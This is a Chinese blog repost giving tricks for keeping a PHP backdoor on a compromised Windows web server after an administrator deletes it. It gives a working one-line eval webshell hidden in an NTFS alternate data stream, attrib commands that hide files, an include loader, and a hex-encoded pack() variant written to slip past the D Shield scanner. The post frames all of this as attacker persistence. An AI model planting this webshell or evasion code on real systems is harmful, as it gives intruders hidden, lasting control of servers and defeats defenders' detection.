码迷,mamicode.com
首页 > Web开发 > 详细

php后门隐藏技巧

时间:2018-06-24 14:09:22      阅读:393      评论:0      收藏:0      [点我收藏+]

标签:直接   资源管理器   使用   alternate   pack   nat   index.php   删除   其它   

Part 1 前言

  辛辛苦苦拿下的shell,几天没看,管理员给删了。

技术分享图片

 

Part 2 隐藏

  隐藏的技巧很多,废话不多说直接开始。

 

一. attrib +s +h

  创建系统隐藏文件。

attrib +s +a +r +h  /   attrib +s +h  文件名

技术分享图片

 

  查看隐藏文件

技术分享图片

 

二. 利用ADS隐藏文件

  NTFS交换数据流(Alternate Data Streams,简称ADS)是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS数据流,我们可以做很多有趣的事情。(抄的)

 

  1.首先创建ADS隐藏文件

在命令行,echo一个数据流进去,比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

技术分享图片

 

  可用 dir /r 命令来查看

技术分享图片

  修改与删除

修改:

  进入文件所在目录,notepad index.php:shell.jpg

技术分享图片

 

如何删除index.php:shell.jpg呢?

  直接删除index.php

技术分享图片  

  2. 文件包含

  我们生成了index.php:shell.jpg,可以通过包含文件的方式来使用。

<?php include(‘index.php:shell.jpg‘)?>

技术分享图片

  还可以用上面学的隐藏include.php

技术分享图片

  3. 免杀

隐藏了也不行兄dei,D盾一扫瞬间爆炸。

技术分享图片

把 index.php:shell.jpg  hex编码

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>

技术分享图片

 

  

php后门隐藏技巧

标签:直接   资源管理器   使用   alternate   pack   nat   index.php   删除   其它   

原文地址:https://www.cnblogs.com/s0mf/p/9220165.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!